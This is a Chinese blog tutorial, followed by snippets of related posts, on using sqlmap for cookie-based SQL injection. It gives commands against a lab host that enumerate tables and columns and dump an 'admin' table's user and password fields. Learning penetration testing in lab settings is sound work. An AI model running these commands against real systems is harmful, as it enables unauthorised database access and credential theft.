sqlmap之(五)----Cookie注入实战

最新推荐文章于 2024-06-07 19:41:22 发布
最新推荐文章于 2024-06-07 19:41:22 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: 网络攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangliu463884153/article/details/80029056
版权

(1) cookie注入,猜解表

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2  

 

 


do you want to URL encode cookie values (implementation specific)? [Y/n]

你想要对URL值进行URL编码(具体实现)吗?   输入"Y"

 

 

Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

cookie参数“id”是脆弱的。你想继续测试其他(如果有的话)吗?  输入"Y"

 

 

do you want to use common table existence check? [Y/n/q]

你是否要使用存在的公共表去检查? [Y/n/q]  输入"Y" 并输入线程数。

 

 

等待一下就出结果了。

 

 

(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --columns -T admin --level 2  

 

 

 

(3) 猜解内容

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --dump -T admin -C "user,password" --level 2  


 

 

猜出的内容为

 

 
 
寂地沉
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手把手带你学习SQLMAP
2301_77147728的博客
03-22 721
表中的所有字段的内容,在这里可以清晰的看到user字段对应的password字段的值,这就是拖库的基本原理,学会了的给个赞。后面一系列的黑科技,由于权限不够,暂时就不分析了,下次有机会咱们再碰一碰。相反,这也说明了权限的重要性。可以看到这里咱们的Cookie是,security=medium表示咱们现在处于中级模式。美滋滋,成功了,抓包重放,屡试不爽,学会的给个赞~这里可以看到,咱们这个漏洞靶场使用的数据库是。选哪张表,你可以看当时自己的心情。可以看到这里咱们的Cookie是,数据库里面,我们获得到。
sqlmap详细教程
简介
01-04 3180
SQLmqp教程!
sqlmap工作原理
最新发布
2401_85233504的博客
06-07 197
确定数据库类型: 一旦SQLMap识别出可能存在SQL注入参数,它会尝试确定后端数据库的类型。不同的数据库系统(如MySQL、Oracle、SQL Server等)有不同的语法和特性,SQLMap通过发送特定的查询来识别这些特性,从而确定数据库类型。获取数据库信息: 确定数据库类型后,SQLMap会尝试获取数据库的详细信息,包括数据库名、表名、列名等。此外,它还能够根据不同的情况优化其攻击策略。报告和记录: SQLMap会记录整个攻击过程,并生成详细的报告,包括发现的漏洞、提取的数据等信息。
SQL注入部分:DVWA+SQLmap+Mysql注入实战
AZXYZNPY的博客
11-21 678
(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。注意:应当在第一个页面就点检查,而不是点击检查源代码之后再点击检查,然后就能获得cookie值,而且每次实验的值都不一样,因此做实验最好一次做完。7、枚举指定数据表中的所有用户名与密码,并down到本地。--tables:枚举指定数据库的所有表。2、枚举当前使用的数据库名称和用户名。5、枚举数据库和指定数据库的数据表。--dbs:枚举当前数据库。-T:指定数据库中的数据表。
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 4544
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
【网络安全 | 渗透工具】SQLmap加密注入教程+实战详析
等风来
08-02 6082
使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
在压缩包`sqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip`中,包含了SQLMap的源码和其他相关资源。解压后,我们可以看到项目的结构,包括源代码、文档、示例以及安装和使用指南。通过研究这些内容,我们可以深入理解...
sqlmap-wx-0.3.1.7z
01-29
SQLMap-WX 0.3.1是一款强大的渗透测试工具,专为数据库漏洞检测和自动化注入攻击设计。这款GUI版本使得操作更为直观,方便了非专业背景的用户进行安全测试。在网络安全领域,了解并熟练使用这样的工具对于保障系统...
sqlmap注入实战教程(图文详解)
热门推荐
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1845
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
测试工具-sqlmap
weixin_42902126的博客
06-27 4274
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4712
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
sqlmap实战 简单的注入学习
qq_43355651的博客
11-29 558
本人是网络安全的在校学生 为了使自己更好的学习和坚持决定记录一下 希望一次次的记录可以使自己慢慢变强 自己最近在学习安全的重要工具------sqlmap,因为初次学习,为了更好的熟悉和方便,在自己本机上安装了sqlmap(未使用kali Linux)。sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞。 本文为学习笔记,仅限于学习交流,不得从事违反法律相关的内容...
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4656
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 551
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1254
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
sqlmap --cookie
07-27
使用sqlmap时,可以使用--cookie参数来设置cookie值,以便进行基于cookie验证的注入测试。例如,可以使用以下命令来设置cookie值: sqlmap.py -u "http://example.com/vulnerabilities/sqli/?id=1" --cookie ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值